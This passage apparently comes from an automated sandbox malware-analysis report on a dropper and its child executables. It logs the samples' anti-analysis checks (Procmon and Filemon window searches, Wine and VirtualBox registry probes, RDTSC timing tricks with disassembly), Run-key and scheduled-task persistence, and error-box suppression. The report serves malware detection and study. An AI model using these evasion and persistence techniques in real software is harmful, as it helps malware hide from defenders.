Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005218001\9305c7ab92.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1005218001\9305c7ab92.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005218001\9305c7ab92.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1005218001\9305c7ab92.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1005218001\9305c7ab92.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005218001\9305c7ab92.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1005218001\9305c7ab92.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1005218001\9305c7ab92.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005220001\9fc857756c.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1005220001\9fc857756c.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005220001\9fc857756c.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1005220001\9fc857756c.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1005220001\9fc857756c.exe	Window searched: window name: PROCMON_WINDOW_CLASS

Source: C:\Users\user\DocumentsDHCAECGIEB.exe

File created: C:\Windows\Tasks\skotes.job

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run clip.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run clip.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run clip64.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run clip64.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 6ca8f7e5e2.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 6ca8f7e5e2.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 9305c7ab92.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 9305c7ab92.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 9fc857756c.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 9fc857756c.exe

Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005220001\9fc857756c.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005220001\9fc857756c.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005220001\9fc857756c.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005220001\9fc857756c.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005220001\9fc857756c.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005220001\9fc857756c.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005220001\9fc857756c.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005220001\9fc857756c.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005220001\9fc857756c.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005220001\9fc857756c.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005220001\9fc857756c.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005220001\9fc857756c.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005220001\9fc857756c.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005220001\9fc857756c.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005220001\9fc857756c.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005220001\9fc857756c.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005220001\9fc857756c.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005220001\9fc857756c.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005220001\9fc857756c.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005220001\9fc857756c.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005220001\9fc857756c.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005220001\9fc857756c.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005220001\9fc857756c.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005220001\9fc857756c.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005220001\9fc857756c.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005220001\9fc857756c.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005220001\9fc857756c.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005220001\9fc857756c.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005220001\9fc857756c.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005220001\9fc857756c.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005220001\9fc857756c.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005220001\9fc857756c.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Evasive API call chain: GetPEB, DecisionNodes, ExitProcess

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	System information queried: FirmwareTableInformation
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	System information queried: FirmwareTableInformation
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	System information queried: FirmwareTableInformation

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1005218001\9305c7ab92.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1005218001\9305c7ab92.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1005220001\9fc857756c.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1005220001\9fc857756c.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1005218001\9305c7ab92.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1005218001\9305c7ab92.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1005220001\9fc857756c.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1005220001\9fc857756c.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 96D6DD second address: 96D6F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 jmp 00007F8FA106A47Bh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 96C696 second address: 96C6A0 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F8FA0CCCDD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 96C7E8 second address: 96C807 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F8FA106A482h 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 96C807 second address: 96C80B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 96C80B second address: 96C811 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 96C930 second address: 96C935 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 96C935 second address: 96C94C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F8FA106A482h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 96CA9B second address: 96CABA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8FA0CCCDE1h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jnp 00007F8FA0CCCDD6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 96CABA second address: 96CAD8 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F8FA106A476h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e jmp 00007F8FA106A480h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 96CC43 second address: 96CC50 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 push esi 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 96CC50 second address: 96CC55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 96CD75 second address: 96CD8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jns 00007F8FA0CCCDD8h 0x0000000d pop esi 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jg 00007F8FA0CCCDD6h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 96CD8F second address: 96CDA7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8FA106A47Eh 0x00000007 je 00007F8FA106A476h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 96CDA7 second address: 96CDAF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 96E8AA second address: 96E8AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 96E92F second address: 96E937 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 96E937 second address: 96E98F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 nop 0x00000007 and edi, dword ptr [ebp+122D183Ah] 0x0000000d jmp 00007F8FA106A483h 0x00000012 push 00000000h 0x00000014 mov ecx, 53FA894Fh 0x00000019 call 00007F8FA106A479h 0x0000001e jmp 00007F8FA106A483h 0x00000023 push eax 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 jmp 00007F8FA106A47Ah 0x0000002c js 00007F8FA106A476h 0x00000032 popad 0x00000033 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 96E98F second address: 96E995 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 96E995 second address: 96E999 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 96E999 second address: 96EA1A instructions: 0x00000000 rdtsc 0x00000002 ja 00007F8FA0CCCDD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push eax 0x00000011 jp 00007F8FA0CCCDD8h 0x00000017 pop eax 0x00000018 mov eax, dword ptr [eax] 0x0000001a push esi 0x0000001b jmp 00007F8FA0CCCDE3h 0x00000020 pop esi 0x00000021 mov dword ptr [esp+04h], eax 0x00000025 jbe 00007F8FA0CCCDE0h 0x0000002b pushad 0x0000002c pushad 0x0000002d popad 0x0000002e js 00007F8FA0CCCDD6h 0x00000034 popad 0x00000035 pop eax 0x00000036 push eax 0x00000037 or dword ptr [ebp+122D1A52h], eax 0x0000003d pop edi 0x0000003e push 00000003h 0x00000040 or esi, 4B7E0C8Eh 0x00000046 jc 00007F8FA0CCCDDCh 0x0000004c xor dword ptr [ebp+122D1C2Ah], ecx 0x00000052 push 00000000h 0x00000054 mov dword ptr [ebp+122D18A3h], edx 0x0000005a clc 0x0000005b push 00000003h 0x0000005d or dword ptr [ebp+122D1844h], ecx 0x00000063 push BAAA1D8Dh 0x00000068 pushad 0x00000069 push edx 0x0000006a pushad 0x0000006b popad 0x0000006c pop edx 0x0000006d push eax 0x0000006e push edx 0x0000006f push ecx 0x00000070 pop ecx 0x00000071 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 96EA94 second address: 96EA99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 96EBC3 second address: 96EC15 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push esi 0x00000006 pop esi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b push 00000000h 0x0000000d push eax 0x0000000e call 00007F8FA0CCCDD8h 0x00000013 pop eax 0x00000014 mov dword ptr [esp+04h], eax 0x00000018 add dword ptr [esp+04h], 0000001Bh 0x00000020 inc eax 0x00000021 push eax 0x00000022 ret 0x00000023 pop eax 0x00000024 ret 0x00000025 or dword ptr [ebp+122D1C2Ah], edi 0x0000002b lea ebx, dword ptr [ebp+124527C1h] 0x00000031 cld 0x00000032 push eax 0x00000033 push eax 0x00000034 push edx 0x00000035 jmp 00007F8FA0CCCDE4h 0x0000003a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 96EC15 second address: 96EC1F instructions: 0x00000000 rdtsc 0x00000002 je 00007F8FA106A47Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 96ED70 second address: 96EDF3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8FA0CCCDE7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a pushad 0x0000000b popad 0x0000000c pop ebx 0x0000000d popad 0x0000000e pop eax 0x0000000f push 00000000h 0x00000011 push eax 0x00000012 call 00007F8FA0CCCDD8h 0x00000017 pop eax 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c add dword ptr [esp+04h], 00000017h 0x00000024 inc eax 0x00000025 push eax 0x00000026 ret 0x00000027 pop eax 0x00000028 ret 0x00000029 mov dword ptr [ebp+122D19BDh], edi 0x0000002f push 00000003h 0x00000031 sbb cl, 00000058h 0x00000034 push 00000000h 0x00000036 mov edx, dword ptr [ebp+122D3666h] 0x0000003c push 00000003h 0x0000003e sub dword ptr [ebp+122D1A73h], edx 0x00000044 call 00007F8FA0CCCDD9h 0x00000049 push edx 0x0000004a jmp 00007F8FA0CCCDDEh 0x0000004f pop edx 0x00000050 push eax 0x00000051 push eax 0x00000052 push edx 0x00000053 jmp 00007F8FA0CCCDDCh 0x00000058 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 96EDF3 second address: 96EE11 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F8FA106A478h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 jng 00007F8FA106A484h 0x00000016 push eax 0x00000017 push edx 0x00000018 jnc 00007F8FA106A476h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 96EE11 second address: 96EEA0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [eax] 0x00000008 jo 00007F8FA0CCCDE3h 0x0000000e jmp 00007F8FA0CCCDDDh 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 pushad 0x00000018 push edi 0x00000019 jl 00007F8FA0CCCDD6h 0x0000001f pop edi 0x00000020 jmp 00007F8FA0CCCDE1h 0x00000025 popad 0x00000026 pop eax 0x00000027 jp 00007F8FA0CCCDD7h 0x0000002d jmp 00007F8FA0CCCDE9h 0x00000032 lea ebx, dword ptr [ebp+124527CCh] 0x00000038 push 00000000h 0x0000003a push eax 0x0000003b call 00007F8FA0CCCDD8h 0x00000040 pop eax 0x00000041 mov dword ptr [esp+04h], eax 0x00000045 add dword ptr [esp+04h], 0000001Bh 0x0000004d inc eax 0x0000004e push eax 0x0000004f ret 0x00000050 pop eax 0x00000051 ret 0x00000052 mov dword ptr [ebp+122D1C1Dh], edx 0x00000058 xchg eax, ebx 0x00000059 pushad 0x0000005a push ecx 0x0000005b push eax 0x0000005c push edx 0x0000005d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 95D950 second address: 95D95E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F8FA106A476h 0x0000000a popad 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 95D95E second address: 95D981 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 pushad 0x00000007 push ebx 0x00000008 jmp 00007F8FA0CCCDDBh 0x0000000d pop ebx 0x0000000e pushad 0x0000000f jne 00007F8FA0CCCDD6h 0x00000015 pushad 0x00000016 popad 0x00000017 pushad 0x00000018 popad 0x00000019 popad 0x0000001a push esi 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 98CABE second address: 98CAE6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8FA106A488h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push esi 0x0000000c pushad 0x0000000d popad 0x0000000e js 00007F8FA106A476h 0x00000014 pop esi 0x00000015 rdtsc
